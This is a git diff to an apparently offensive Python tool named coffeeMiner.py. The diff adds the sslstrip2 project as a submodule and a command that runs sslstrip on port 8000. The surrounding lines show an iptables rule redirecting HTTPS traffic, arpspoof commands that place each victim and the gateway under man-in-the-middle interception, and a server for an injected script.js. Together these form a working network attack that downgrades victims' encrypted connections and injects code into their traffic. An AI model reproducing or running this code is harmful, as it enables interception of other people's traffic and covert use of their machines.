diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000..ae7b16e --- /dev/null +++ b/.gitmodules @@ -0,0 +1,3 @@ +[submodule "sslstrip"] + path = sslstrip + url = https://github.com/byt3bl33d3r/sslstrip2 diff --git a/coffeeMiner.py b/coffeeMiner.py index e5cf421..163eb18 100644 --- a/coffeeMiner.py +++ b/coffeeMiner.py @@ -39,6 +39,9 @@ os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRE for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") + +# run SSLStrip on port 8000 +os.system("python sslstrip.py -l 8000 &") # start the http server for serving the script.js, in a new console os.system("xterm -hold -e 'python3 httpServer.py' &") diff --git a/sslstrip b/sslstrip new file mode 160000 index 0000000..8dac387 --- /dev/null +++ b/sslstrip @@ -0,0 +1 @@ +Subproject commit 8dac3873890b25819a1c1191cbd5de96d3dba219